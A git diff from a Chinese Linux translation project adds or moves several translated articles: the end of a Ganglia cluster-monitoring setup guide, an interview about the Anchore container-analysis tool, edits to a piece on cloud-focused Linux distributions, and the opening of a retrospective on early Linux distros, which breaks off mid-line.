+为完成这个目标,我们需要创建一个用户名并设定一个密码,以访问被 Apache 保护的资源。在本例中,我们先来创建一个叫 `adminganglia` 的用户名,然后给它分配一个密码,它将被储存在 `/etc/httpd/auth.basic`(可以随意选择另一个目录 和/或 文件名, 只要 Apache 对此有读取权限就可以。)  + +``` +# htpasswd -c /etc/httpd/auth.basic adminganglia +``` + +给 adminganglia 输入两次密码完成密码设置。 + +3、 修改配置文件 `/etc/httpd/conf.d/ganglia.conf`: + +``` +Alias /ganglia /usr/share/ganglia + +AuthType basic +AuthName "Ganglia web UI" +AuthBasicProvider file +AuthUserFile "/etc/httpd/auth.basic" +Require user adminganglia + +``` + +4、 编辑 `/etc/ganglia/gmetad.conf`: + +首先,使用 `gridname` 指令来为网格设置一个描述性名称。 + +``` +gridname "Home office" +``` + +然后,使用 `data_source` 指令,后面跟集群名(服务器组)、轮询时间间隔(秒)、主节点主机和被监控节点的 IP 地址: + +``` +data_source "Labs" 60 192.168.0.29:8649 # 主节点 +data_source "Labs" 60 192.168.0.32 # 被监控节点 +``` + +5、 编辑 `/etc/ganglia/gmond.conf`。 + +a) 确保集群的配置类似下面。 + +``` +cluster { +name = "Labs" # gmetad.conf 中的 data_source 指令的名字 +owner = "unspecified" +latlong = "unspecified" +url = "unspecified" +} +``` + +b) 在 `udp_send_chanel` 中,注释掉 `mcast_join`: + +``` +udp_send_channel { +# mcast_join = 239.2.11.71 +host = localhost +port = 8649 +ttl = 1 +} +``` + +c) 在 `udp_recv_channel` 中,注释掉 `mcast_join` 和 `bind` 部分: + +``` +udp_recv_channel { +# mcast_join = 239.2.11.71 ## comment out +port = 8649 +# bind = 239.2.11.71 ## comment out +} +``` + +保存并退出。 + +6、打开 8649/udp 端口,使用 SELinux 确保 php 脚本(通过 Apache 运行)能够连接到网络: + +``` +# firewall-cmd --add-port=8649/udp +# firewall-cmd --add-port=8649/udp --permanent +# setsebool -P httpd_can_network_connect 1 +``` + +7、重启 Apache、gmetad、gmond,并确保它们启用了“开机启动”。 + +``` +# systemctl restart httpd gmetad gmond +# systemctl enable httpd gmetad httpd +``` + +至此,我们现在能够打开 Ganglia 的 Web 页面 `http://192.168.0.29/ganglia` 并用步骤 2 中设置的凭证登录。 + + [![Gangila Web Interface](http://www.tecmint.com/wp-content/uploads/2016/06/Gangila-Web-Interface.png)][5] + +*Gangila Web 页面* + +8、 在 **Ubuntu** 主机上,只需安装 Ganglia-monitor,等同于 CentOS 上的 ganglia-gmond: + +``` +$ sudo aptitude update && aptitude install ganglia-monitor + +``` + +9、 编辑被监控主机的 `/etc/ganglia/gmond.conf` 文件。与主节点主机上是相同的文件,除了被注释掉的 `cluster`, `udp_send_channel` , `udp_recv_channel` 这里不应被注释: + +``` +cluster { +name = "Labs" # The name in the data_source directive in gmetad.conf +owner = "unspecified" +latlong = "unspecified" +url = "unspecified" +} +udp_send_channel { +mcast_join = 239.2.11.71 +host = localhost +port = 8649 +ttl = 1 +} +udp_recv_channel { +mcast_join = 239.2.11.71 ## comment out +port = 8649 +bind = 239.2.11.71 ## comment out +} +``` + +之后重启服务。 + +``` +$ sudo service ganglia-monitor restart +``` + +10、 刷新页面,你将在 Home office grid / Labs cluster 中看到两台主机的各种统计及图形化的展示(用下拉菜单选择集群,本例中为 Labs): + +[![Ganglia Home Office Grid Report](http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Home-Office-Grid-Report.png)][4] + +*Ganglia 中 Home office 网格报告* + +使用菜单按钮(如上指出的),你可以获取到每台服务器和集群的信息。还可以使用 对比主机Compare Hosts选项卡来比较集群中所有服务器的状态。 + +可以使用正则表达式选择一组服务器,立刻就可以看到它们性能的对比: + +[![Ganglia Host Server Information](http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Server-Information.png)][3] + +*Ganglia 服务器信息* + +我最喜欢的一个特点是对移动端有友好的总结界面,可以通过 Mobile 选项来访问。选择你感兴趣的集群,然后选中一个主机。 + +[![Ganglia Mobile Friendly Summary View](http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Mobile-View.png)][2] + +*Ganglia 移动端总结截图* + +### 总结 + +本篇文章向大家介绍了 Ganglia,它是一个功能强大、扩展性很好的监控工具,主要用来监控集群和网格。它可以随意安装,便捷的组合各种功能(你甚至可以尝试一下[官方网站][1] 提供的 Demo)。 + +此时,你可能会发现许多知名的 IT 或非 IT 的企业在使用 Ganglia。除了我们在文章中提及的之外,还有很多理由这样做,其中易用性,统计的图形化(在名字旁附上脸部照片更清晰,不是吗)可能是最重要的原因。 + +但是请不要拘泥于本篇文章,尝试一下自己去做。如果你有任何问题,欢迎给我留言。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/install-configure-ganglia-monitoring-centos-linux/ + +作者:[Gabriel Cánepa][a] +译者:[ivo-wang](https://github.com/ivo-wang) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: http://www.tecmint.com/author/gacanepa/ +[1]:http://ganglia.info/ +[2]:http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Mobile-View.png +[3]:http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Server-Information.png +[4]:http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Home-Office-Grid-Report.png +[5]:http://www.tecmint.co m/wp-content/uploads/2016/06/Gangila-Web-Interface.png +[6]:http://httpd.apache.org/docs/current/howto/auth.html +[7]:https://linux.cn/article-2324-1.html +[8]:http://www.tecmint.com/wp-content/uploads/2016/06/ Install-Gangila-Monitoring-in-Linux.png +[9]:http://www.tecmint.com/install-icinga-in-centos-7/ +[10]:http://www.tecmint.com/install-and-configure-zabbix-monitoring-on-debian-centos-rhel/ +[11]:http://www.tecmint.com/install-nagios-in-linux/ diff --git a/published/20160823 Getting Started with HTTP2 - Part 1.md b/published/201701/20160823 Getting Started with HTTP2 - Part 1.md similarity index 100% rename from published/20160823 Getting Started with HTTP2 - Part 1.md rename to published/201701/20160823 Getting Started with HTTP2 - Part 1.md diff --git a/published/20160929 Getting Started with HTTP2 - Part 2.md b/published/201701/20160929 Getting Started with HTTP2 - Part 2.md similarity index 100% rename from published/20160929 Getting Started with HTTP2 - Part 2.md rename to published/201701/20160929 Getting Started with HTTP2 - Part 2.md diff --git a/published/201701/20161004 Keeping Linux containers safe and secure.md b/published/201701/20161004 Keeping Linux containers safe and secure.md new file mode 100644 index 0000000000..af4885e8ed --- /dev/null +++ b/published/201701/20161004 Keeping Linux containers safe and secure.md @@ -0,0 +1,66 @@ +保持 Linux 容器的安全和稳定 +============ + +![Interview with Andy Cathrow of Anchore](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/bus-containers2.png?itok=rG1pTnZ4) + +> 图片来源: [Lucarelli](http://commons.wikimedia.org/wiki/User:Lucarelli) 基于 [Wikimedia Commons](http://commons.wikimedia.org/wiki/File:Containers_Livorno.jpg). CC-BY-SA 3.0 + +Linux 容器正在改变 IT 从业者的工作方式。相比于庞大、沉重的虚拟机,一些组织发现把他们的应用部署在容器中更有效,可以提供更快的速度,更加密集,提升他们操作的敏捷性。 + +从安全的角度看,容器带来了一些优势,但是也面临着它们自己的一些安全挑战。和传统的基础设施一样,为了避免安全缺陷,确保运行在一个容器内的组件和系统库的定期更新是至关重要的。但是你如何知道什么东西运行在你的容器内?为了帮助你应对这些的安全挑战,一个名为 [Anchore](https://anchore.com)的初创公司正在开发一个[同名的开源项目](https://github.com/anchore/anchore),它用来帮助展示 Linux 容器中的内容。 + +为了了解更多关于 Anchore,我找到了 Anchore 的市场和产品的发言人 Andrew Cathrow,来了解更多关于这个开源项目背后的公司。 + +![](https://opensource.com/sites/default/files/images/life/Interview%20banner%20Q%26A.png) + +### 简而言之 Anchore 是什么? 它如何工作? + +Anchore 的目标是提供一套工具,允许开发人员、运营团队、安全团队在容器的整个开发周期中保持对“监管链(Chain of Custody)”的全程可见,并提供生产部署所需的可见性、可预测性和控制性。Anchore 的引擎通过插件可以进行分析(通过提取镜像数据和元数据)、查询(允许对容器进行分析)、以及策略评估(这里的策略指可以被指定的管理的图像)。 + +虽然市场上有很多扫描工具,但是大部分不开源。我们认为安全合规的产品应该是开源的,否则你怎么才能信任他们。 + +Anchore 除了开源以外,还有两大优势,使它可以区别于市场中的商业产品。 + +首先,我们看的不止是操作系统的镜像。如今的扫描工具专注于操作系统的软件包,比如“你的 RPM 或 DEB 包中有CVE(安全漏洞)么?”这虽然是很重要的,你不希望你的镜像中有不安全的包,但是操作系统包只是镜像的基础。其他的层次都需要进行验证,包括配置文件、语言模块、中间件等等。你可以用的全是最新的软件包,但是可能一个配置文件配置出现错误,不安全就出现在里面。第二个不同就是允许用户添加自己的数据、查询或策略来扩展这个引擎。 + +### 什么推动了容器的校验和分析工具的需求出现?这个工具可以解决运营面临的什么问题呢? + +企业使用 Docker 首要关注的就是安全,特别是他们正在部署的容器的分配和合规性。在生产环境中,从公共镜像库拉取一个镜像,运行它,并在几秒钟部署,是非常简单的,甚至不知道下面可能发生什么。终端用户在部署应用时,必须信任他们所部署的是安全、高效和易于维护的。 + +容器是不透明的,它们是一个包含应用程序的可部署的“黑盒”。虽然非常容易把这些镜像看作“打包的应用程序”,但是它们包括了系统的镜像和多达数百个包和成千上万个文件。如同所有在物理服务器、虚拟机或者云上的操作系统一样,镜像也需要维护。镜像或许包含了未补丁的安全缺陷、带有 bug 和错误配置的过期软件。 + +要对您的容器部署有信心,你需要知道底层是什么,并基于容器镜像的内容来做出决定。 + +### 如今容器的创新基本上都是开源的,你认为是为什么呢?是什么促使了它们开源呢? + +在过去的 20 年中,各个组织已经经历了开源带来的优势,节省成本,减少锁定,提高了安全性和更快的创新。容器,特别是 Docker,都是非常好的例子。Docker 公司的团队不能在专有系统上创建一个新的软件部署模式,他们不能要求在修改专有系统的代码,而是与行业领导者比如谷歌、IBM、英特尔、红帽合作,朝着一个共同的目标。开源和 Linux 总是开启创新和激励产业困境。在过去,实现一个大的想法需要一个大的团队和很多资源。在开源世界,一个有着很大的创意的小公司可以工作在一个更大的社区中,通过知识共享的力量来协作,提供真正的企业创新。 + +为了深入的说明开源的使用,Anchroe 团队最近刚从多伦多的 LinuxCon 回来,在哪里,令人难以相信的是,微软作为钻石级的赞助商,展示了他们用在 Linux 上的产品投入的增长。Linus Toravlds 曾说过,“如果微软为 Linux 开发应用就意味着我赢了”。我要把这句话改为“开源赢了”。 + +### 容器领域的通用标准的创建还需要时间,在容器的几乎所有部分,仍有许多挑战。在这个领域,创业公司有哪些挑战? + +这里有个很重要的点,就是没有开放的标准和开源,我们不可能看到快速推动容器的采用和改变行业格局的创新。开放容器倡议(OCI)由 Linux 和容器行业的行业领导者组成,正在为运行环境和镜像格式创造标准,这将使我们能够看到更多的创新。Anchore 很自豪能成为 OCI 的新成员,我们期待帮助形成标准。 + +###你将如何围绕 Anchor 项目建立一个开源社区? + +Anchore 团队来自 Ansible、Eucalyptus Systems 和 Red Hat 的领导团队,在开源社区中拥有丰富的工作经验。从一开始,Anchore 就准备创建一个强大的开源社区,我们正在应用我们在开源世界中学到的经验和教训。第一课,当然,发布要尽早尽快。我们在 6 月开源我们的检测和分析引擎,远远早于我们的商用产品,以便了确保开源项目能够独立运行,使更多的直接用户能够使用它,而无需购买 Anchore 的商用产品。通过支持、服务和增强型的数据源,有很多机会给商用产品创造更多价值,但是如果开源引擎本身没有用,我们将看不到活跃的社区。 + +我们将 Anchore 模块化,允许添加分析、报告和策略插件,而不需要更改核心的引擎。我们希望保证任何人都可以创建插件,所以我们选择了 Python 作为项目的基本语言,因为 Python 被开发者和系统管理员广泛应用。但是,即使你不熟悉 Python,你仍然可以使用任何你喜欢的语言或者脚本环境创建插件。如果你可以创建一个 Bash 脚本,那么你也可以创建一个 Anchore 插件。我们的目标是最大化的吸引社区的参与。虽然我们鼓励用户将贡献回馈给社区,但是我们也为这个项目构建并进行了授权,来确保可以独立创建和维护私有的插件和模块。 + +### 容器的用途不止是在服务器上更大密度的部署应用程序或者技术层面更快的速度,而且还有不同工具的组合,这些工具提供了一种不同的方式来拉近开发者和操作者共同工作。作为在这个领域工作的公司,你们希望提供一个什么样的消息来让开发者和运营产生共鸣? + +随着越来越多的运行环境、编排、监控和集成产品,容器的生态系统正在快速发展。所以,我们的架构中的第一个考虑因素不是限定 Anchore 的部署和使用。我们需要确保我们可以适应任何 CI/CD 工作流,无论是私有部署还是云端部署。一个经常问到我们的问题是,Anchore 是否将提供一个包含了镜像扫描和分析的容器仓库。虽然这将大大简化我们的工作,但是这会迫使用户进入特定的部署架构,并限制了用户部署他们自己最好的组件的能力。我们已经确保 Anchore 可以和所有领先的仓库、运行环境平台、 CI/CD 平台和编排工具配合使用。 + +一些开发者掌握了运营技能,并转换为 DevOps 角色,我们看到系统管理员/运营团队也在更多的了解开发,转换成 DevOps 角色。我们也看到了具有混合能力的团队。我们设计了可供开发运营和安全团队使用的 Anchore ,以便他们共同定义规则和策略来评估开发周期中的任何一个环节。另外一个例子是插件/模块的架构,使任何人都可以在他们喜欢的环境中轻松创建一个模块 —— 无论是以 Python、Go、Perl、C 甚至是一个 Bash 脚本。 + +------ + +via: https://opensource.com/business/16/10/interview-andy-cathrow-anchore + +作者:[Jason Baker][a] +译者:[Bestony](https://github.co/Bestony) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: https://opensource.com/users/jason-baker diff --git a/published/20161005 GETTING STARTED WITH ANSIBLE.md b/published/201701/20161005 GETTING STARTED WITH ANSIBLE.md similarity index 100% rename from published/20161005 GETTING STARTED WITH ANSIBLE.md rename to published/201701/20161005 GETTING STARTED WITH ANSIBLE.md diff --git a/published/20161012 Introduction to FirewallD on CentOS.md b/published/201701/20161012 Introduction to FirewallD on CentOS.md similarity index 100% rename from published/20161012 Introduction to FirewallD on CentOS.md rename to published/201701/20161012 Introduction to FirewallD on CentOS.md diff --git a/published/20161024 How to Use Old Xorg Apps in Unity 8 on Ubuntu 16.10.md b/published/201701/20161024 How to Use Old Xorg Apps in Unity 8 on Ubuntu 16.10.md similarity index 100% rename from published/20161024 How to Use Old Xorg Apps in Unity 8 on Ubuntu 16.10.md rename to published/201701/20161024 How to Use Old Xorg Apps in Unity 8 on Ubuntu 16.10.md diff --git a/published/20161028 Inkscape: Adding some colour.md b/published/201701/20161028 Inkscape: Adding some colour.md similarity index 100% rename from published/20161028 Inkscape: Adding some colour.md rename to published/201701/20161028 Inkscape: Adding some colour.md diff --git a/published/20161104 Create a simple wallpaper with Fedora and Inkscape.md b/published/201701/20161104 Create a simple wallpaper with Fedora and Inkscape.md similarity index 100% rename from published/20161104 Create a simple wallpaper with Fedora and Inkscape.md rename to published/201701/20161104 Create a simple wallpaper with Fedora and Inkscape.md diff --git a/translated/tech/20161107 CLOUD FOCUSED LINUX DISTROS FOR PEOPLE WHO BREATHE ONLINE.md b/published/201701/20161107 CLOUD FOCUSED LINUX DISTROS FOR PEOPLE WHO BREATHE ONLINE.md similarity index 52% rename from translated/tech/20161107 CLOUD FOCUSED LINUX DISTROS FOR PEOPLE WHO BREATHE ONLINE.md rename to published/201701/20161107 CLOUD FOCUSED LINUX DISTROS FOR PEOPLE WHO BREATHE ONLINE.md index 950d21ab7c..fbdeb75b05 100644 --- a/translated/tech/20161107 CLOUD FOCUSED LINUX DISTROS FOR PEOPLE WHO BREATHE ONLINE.md +++ b/published/201701/20161107 CLOUD FOCUSED LINUX DISTROS FOR PEOPLE WHO BREATHE ONLINE.md @@ -1,5 +1,4 @@ - -为了畅游网络的人们、专注于云端的 Linux 发行版 +专注于云端的 Linux 发行版 ============================================================ [ @@ -8,85 +7,81 @@ 概述:我们列举几款以云端为中心的 Linux 发行版,它们被视为真正能替代 Chrome OS 的 Linux 发行版。 -这个世界正在向云端服务转变,而且我们都知道 Chrome OS 倍受人们喜爱。嗯,它确实值得尊重。它超级快、轻盈、省电、简约、设计精美而且充分发挥了当今科技所能提供的云端潜能。 +世界正在向云端服务转变,而且我们都知道 Chrome OS 倍受人们喜爱。嗯,它确实值得赞许。它超级快、轻盈、省电、简约、设计精美而且充分发挥了当今科技所能提供的云端潜能。 -虽然 [Chrome OS][7] 只能在谷歌的硬件上使用,但是,就只是在你的台式机或者笔记本上,还是有其他的方法来体验云计算的潜能。 +虽然 [Chrome OS][7] 只能在谷歌的硬件上使用,但是,在你的台式机或者笔记本上,还是有其他的方法来体验云计算的潜能。 -正如我重复所说的,在 Linux 领域中,人们总能参与其中。有那些看起来像 Windows 或者 Mac OS 的Linux 发行版。Linux 汇集了分享,爱和计算体验的最前沿。让我们马上看看这份列表吧! +正如我重复所说的,在 Linux 领域中,人们总能参与其中,比如那些看起来像 Windows 或者 Mac OS 的Linux 发行版。Linux 汇集了分享,爱和计算体验的最前沿。让我们马上看看这份列表吧! -### 1\. CUB LINUX +### 1、 Cub Linux - ![Cub Linux Desktop](https://itsfoss.com/wp-content/uploads/2016/10/cub1.jpg) +![Cub Linux Desktop](https://itsfoss.com/wp-content/uploads/2016/10/cub1.jpg) 这不是 Chrome OS ,上述图片描绘的是 Cub Linux 的桌面。不清楚我说的什么? -Cub Linux 对于 Linux 用户来说不再新鲜,但是如果你确实不知道的话,(我来解释下,)Cub Linux 灵感来源于主流的 Chrome OS ,是一款专注于网页的 Linux 发行版。从母亲 Linux 来讲,它也是 Chrome OS 的开源兄弟。 +Cub Linux 对于 Linux 用户来说不是什么新鲜事,但是如果你确实不知道的话,(我来解释下,)Cub Linux 灵感来源于主流的 Chrome OS ,是一款专注于网页的 Linux 发行版。从母亲 Linux 来讲,它也是 Chrome OS 的开源兄弟。 -Chrome OS 内置了 Chrome 浏览器。不久之前,一个名为 [Chromixium OS][10] 的项目启动,旨在用 Chromium 浏览器取代 Chrome 浏览器,来提供与 Chrome OS 同样的体验。因为一些法律上的争论,项目名字后来改为 Cub Linux (取自 Chromium 和 Ubuntu 两个词)。 +Chrome OS 内置了 Chrome 浏览器。不久之前,一个名为 [Chromixium OS][10] 的项目启动,旨在用 Chromium 浏览器取代 Chrome 浏览器,来提供与 Chrome OS 同样的体验。因为一些法律上的争论,项目名字后来改为 Cub Linux (取自 **C**hromium 和 **Ub**untu 两个词)。 - ![cub2](https://itsfoss.com/wp-content/uploads/2016/10/cub2.jpg) +![cub2](https://itsfoss.com/wp-content/uploads/2016/10/cub2.jpg) -在历史部分,如名字提示的那样,Cub Linux 基于 Ubuntu ,使用了轻量的 Openbox 桌面环境。定制桌面来给人以 Chrome OS 的印象,而且看起来很整洁。 +撇开历史不说,如名字提示的那样,Cub Linux 基于 Ubuntu ,使用了轻量的 Openbox 桌面环境。定制的桌面来给人以 Chrome OS 的印象,而且看起来很整洁。 -在应用部分,你能安装 Chrome 网上商店的网络应用和所有的 Ubuntu 应用。对,有 Chrome OS 的精美应用,你仍能体会到 Ubuntu 的好处。 +在应用部分,你能安装 Chrome 网上商店的网页应用和所有的 Ubuntu 应用。对,有 Chrome OS 的精美应用,你仍能体会到 Ubuntu 的好处。 -就表现而言,这操作系统相当快多亏了它自身的 Openbox 桌面环境。基于 Ubuntu ,Cub Linux 的稳定性是毋庸置疑的。这桌面流畅的动画和漂亮的用户界面,对于眼睛是一种享受, +就表现而言,这操作系统相当快,这多亏了它自身的 Openbox 桌面环境。基于 Ubuntu ,Cub Linux 的稳定性是毋庸置疑的。这桌面流畅的动画和漂亮的用户界面,对于眼睛是一种享受。 -[Suggested Read[Year 2013 For Linux] 2 Linux Distributions Discontinued][11] +我向花费大部分时间在浏览器,时不时做些家务的人推荐 Cub Linux 。嗯,一个浏览器就是你所需要的全部,而且,一个浏览器就可以让你得到全部。 -我向花费大部分时间在浏览器,时不时做些家务的人推荐 Cub Linux 。嗯,一个浏览器就是你所需要的全部,而且,一个浏览器正是你将会得到的全部。 - -### 2\. PEPPERMINT OS +### 2、Peppermint OS 不少人把目光投向 Linux 因为他们想要一个良好的使用计算机的体验。一些人是真的不喜欢防病毒软件、磁盘整理程序、清理工具的打扰,他们只是想要一个操作系统而不是个孩子。我必须说 Peppermint OS 真的不会打扰用户。[Peppermint OS][12] 的开发者在理解用户需求上花费了大量的时间精力。 - ![pep1](https://itsfoss.com/wp-content/uploads/2016/11/pep1.jpg) +![pep1](https://itsfoss.com/wp-content/uploads/2016/11/pep1.jpg) -系统默认内置了很少的软件。内置从每一个软件类别挑选的一些应用,这传统的想法没有被开发者所采纳,这为了良好的用户体验。个性化定制电脑的权力已经移交给用户。顺便说一句,当能用网页替代几乎大部分应用时,我们真的需要安装那么多的应用吗? +系统默认内置了很少的软件。从每一个软件类别挑选的一些应用内置进去,这种传统的想法没有被开发者所采纳,这是为了良好的用户体验。个性化定制电脑的权力已经移交给用户。顺便说一句,当能用网页替代几乎大部分应用时,我们真的需要安装那么多的应用吗? -Ice +**Ice** Ice 是一个有用的小工具,它能将你最喜爱和经常用到的网页转化成桌面应用,这样你就能直接从你的桌面或菜单启动。这就是我们所说的特定页浏览器。 - ![pep4](https://itsfoss.com/wp-content/uploads/2016/11/pep4.jpg) +![pep4](https://itsfoss.com/wp-content/uploads/2016/11/pep4.jpg) -喜欢 facebook ?为了快速启动,为什么不弄一个 facebook 的网页应用在你的桌面上?当人们抱怨 Linux 上不知如何正确安装 Google Drive 应用时,Ice 能让你在一次单击就能访问 +喜欢 facebook ?想要快速启动,为什么不弄一个 facebook 的网页应用在你的桌面上?当人们抱怨 Linux 上不知如何正确安装 Google Drive 应用时,Ice 能让你在一次单击就能访问 -Peppermint OS 7 是基于 Ubuntu 16.04 。它不仅有流畅、稳固的表现,而且反应很快。一个深度定制的 LXDE 将会是你的首页。我所说的定制是为了实现华丽的表现和视觉吸引力。 +Peppermint OS 7 是基于 Ubuntu 16.04 。它不仅有流畅、稳固的表现,而且反应很快。一个深度定制的 LXDE 将会是你的首页。我所说的定制是兼顾了华丽的表现和视觉吸引力。 -Peppermint OS 介于云操作系统和本地操作系统。虽然这操作系统的框架被设计来支持快速的云端应用,但是本地的 Ubuntu 应用运行得也不错。如果你是像我那样,想要一个能在在线和离线之间保持平衡的操作系统的话,[Peppermint OS 很适合你][13]。 +Peppermint OS 介于云操作系统和本地操作系统。虽然这个操作系统的框架被设计来支持快速的云端应用,但是本地的 Ubuntu 应用运行得也不错。如果你是像我那样,想要一个能在在线和离线之间保持平衡的操作系统的话,[Peppermint OS][13] 很适合你。 -[Suggested ReadPennsylvania High School Distributes 1,700 Ubuntu Laptops to Students][14] - -### 3.APRICITY OS +### 3、Apricity OS [Apricity OS][15] 在这里是极具美感的 Linux 发行版之一。它就像是 Linux 里的蒙娜丽莎。但是,不止外观优美,它还有更多优点。 - ![ap2](https://itsfoss.com/wp-content/uploads/2016/11/ap2.jpg) +![ap2](https://itsfoss.com/wp-content/uploads/2016/11/ap2.jpg) -将 [Apricity OS][16] 加入这名单中的基本理由是它的简洁。当桌面操作系统设计变得越来越乱、堆砌元素时(我只是在讨论 Linux 操作系统),Apricity 除去所有杂项,简化最基本的人机交互。在这,Gnome 桌面环境被定制得非常优美。他们使其变得更简单。 +将 [Apricity OS][16] 加入这名单中的基本理由是它的简洁。当桌面操作系统设计变得越来越乱、堆砌元素时(我不只是在讨论非 Linux 操作系统),Apricity 除去所有杂项,简化最基本的人机交互。在这,Gnome 桌面环境被定制得非常优美。他们使其变得更简单。 -预装的软件真的很少。几乎所有的 Linux 发行版有同样的预装软件。但是 Apricity OS 有一个全新的软件集合。Chrome 而不是 Firefox 。我真的很期待这点。我是说为什么不在外面告诉我们改变了什么? +预装的软件真的很少。几乎所有的 Linux 发行版都预装一样的预装软件。但是 Apricity OS 有一个全新的软件集合。提供了 Chrome 而不是 Firefox 。我真的很期待这点。我是说为什么不在外面告诉我们改变了什么? -Apricity OS 也展现了我们在上一段讨论的 Ice 工具。但不是 Firefox ,Chrome 浏览器被用在网页-桌面一体化里。Apricity OS 默认内置了 Numix Circle 图标。。每一次你添加一个网页应用,那就会有一个优美的图标放在你的底栏上。 +Apricity OS 也展现了我们在上一段讨论的 Ice 工具。但不是 Firefox ,而是将 Chrome 浏览器用在网页-桌面一体化里。Apricity OS 默认内置了 Numix Circle 图标。每一次你添加一个流行的网页应用,那就会有一个优美的图标放在你的底栏上。 ![](https://itsfoss.com/wp-content/uploads/2016/11/ap1.jpg) 看见我所说的了吗? -Apricity OS 基于 Arch Linux 。(所以任何想要快速上手 Arch ,想要优美发行版的人,来[这里][17]下载 Apricity 的 ISO 文件。) Apricity 完全保持了 Arch 选择自由的原则。 +Apricity OS 基于 Arch Linux 。(所以任何想要快速上手 Arch ,想要优美发行版的人,来[这里][17]下载 Apricity 的 ISO 文件吧。) Apricity 完全保持了 Arch “选择自由”的原则。在 Ice 上只要花费十分钟,你就能把你所有喜爱的网页应用配置好。 -华丽的背景,极简主义的桌面和一大堆的功能。这些特性使得 Apricity OS 在建立一个很棒的云端系统上成为一个极佳选择。在 Apricity OS 花上5分钟来使你完全爱上它。我是认真的。 +华丽的背景,极简主义的桌面和一大堆的功能。这些特性使得 Apricity OS 在建立一个很棒的云端系统方面成为一个极佳选择。在 Apricity OS 花上 5 分钟,你就会完全爱上它。我是认真的。 -到此你就看完了全部。给网上居住者的云端 Linux 发行版。给我们关于网页应用和本地应用话题的看法。别忘了分享。 +到此你就看完了全部,这是给网上居住者的云端 Linux 发行版。给我们一些关于网页应用和本地应用话题的看法。别忘了分享。 -------------------------------------------------------------------------------- via: https://itsfoss.com/cloud-focused-linux-distros/ -作者:[Aquil Roshan ][a] +作者:[Aquil Roshan][a] 译者:[ypingcn](https://github.com/ypingcn) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/20161126 Building Vim from source.md b/published/201701/20161126 Building Vim from source.md similarity index 100% rename from published/20161126 Building Vim from source.md rename to published/201701/20161126 Building Vim from source.md diff --git a/published/20161128 Managing devices in Linux.md b/published/201701/20161128 Managing devices in Linux.md similarity index 100% rename from published/20161128 Managing devices in Linux.md rename to published/201701/20161128 Managing devices in Linux.md diff --git a/published/20161201 How to Configure a Firewall with UFW.md b/published/201701/20161201 How to Configure a Firewall with UFW.md similarity index 100% rename from published/20161201 How to Configure a Firewall with UFW.md rename to published/201701/20161201 How to Configure a Firewall with UFW.md diff --git a/published/20161201 Using the NTP time synchronization.md b/published/201701/20161201 Using the NTP time synchronization.md similarity index 100% rename from published/20161201 Using the NTP time synchronization.md rename to published/201701/20161201 Using the NTP time synchronization.md diff --git a/published/20161205 Manage Samba4 Active Directory Infrastructure from Windows10 via RSAT – Part 3.md b/published/201701/20161205 Manage Samba4 Active Directory Infrastructure from Windows10 via RSAT – Part 3.md similarity index 100% rename from published/20161205 Manage Samba4 Active Directory Infrastructure from Windows10 via RSAT – Part 3.md rename to published/201701/20161205 Manage Samba4 Active Directory Infrastructure from Windows10 via RSAT – Part 3.md diff --git a/published/20161206 How to Find Recent or Today’s Modified Files in Linux.md b/published/201701/20161206 How to Find Recent or Today’s Modified Files in Linux.md similarity index 100% rename from published/20161206 How to Find Recent or Today’s Modified Files in Linux.md rename to published/201701/20161206 How to Find Recent or Today’s Modified Files in Linux.md diff --git a/published/20161213 9 Open SourceCommercial Software for Data Center Infrastructure Management.md b/published/201701/20161213 9 Open SourceCommercial Software for Data Center Infrastructure Management.md similarity index 100% rename from published/20161213 9 Open SourceCommercial Software for Data Center Infrastructure Management.md rename to published/201701/20161213 9 Open SourceCommercial Software for Data Center Infrastructure Management.md diff --git a/published/20161215 Building an Email Server on Ubuntu Linux - Part 3.md b/published/201701/20161215 Building an Email Server on Ubuntu Linux - Part 3.md similarity index 100% rename from published/20161215 Building an Email Server on Ubuntu Linux - Part 3.md rename to published/201701/20161215 Building an Email Server on Ubuntu Linux - Part 3.md diff --git a/published/20161216 sshpass -An Excellent Tool for Non-Interactive SSH Login – Never Use on Production Server.md b/published/201701/20161216 sshpass -An Excellent Tool for Non-Interactive SSH Login – Never Use on Production Server.md similarity index 100% rename from published/20161216 sshpass -An Excellent Tool for Non-Interactive SSH Login – Never Use on Production Server.md rename to published/201701/20161216 sshpass -An Excellent Tool for Non-Interactive SSH Login – Never Use on Production Server.md diff --git a/published/201701/20161220 How Linux got to be Linux Test driving 1993-2003 distros.md b/published/201701/20161220 How Linux got to be Linux Test driving 1993-2003 distros.md new file mode 100644 index 0000000000..a19668db49 --- /dev/null +++ b/published/201701/20161220 How Linux got to be Linux Test driving 1993-2003 distros.md @@ -0,0 +1,245 @@ +Linux 系统的成长之路:试用 1993-2003 年之间的 Linux 老版本系统 +============================================================ + +> 让我们一起来回顾 Linux 早期版本的美好时光 + +![How Linux got to be Linux: Test driving 1993-2003 distros](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/car-penguin-drive-linux-yellow.png?itok=ueZE5mph "How Linux got to be Linux: Test driving 1993-2003 distros") + +*图片来源:互联网档案馆[书籍][7][图片][8]。 Opensource.com. CC BY-SA 4.0 编辑引用。* + +开源软件最具独特性的一点就是它永远不会真正的走到 EOL(生命的终点)。它们的磁盘镜像文件大都可以一直在网上找到,并且它们的许可证也不会过期,因此,我们可以返回去找到那些老版本的 Linux 系统,并在虚拟机中安装它们,这都是很容易做到的。通过回顾那些珍贵的系统画面,让我们来回顾 Linux 系统这么多年来所发生的翻天覆地的变化。 + +我们从 Slackware 1.01 版本来开始这段旅程,在二十多年前它就发布在 **comp.os.linux.announce** 新闻组上了。 + +### Slackware 1.01 版本系统 (1993 年) + +![slackware 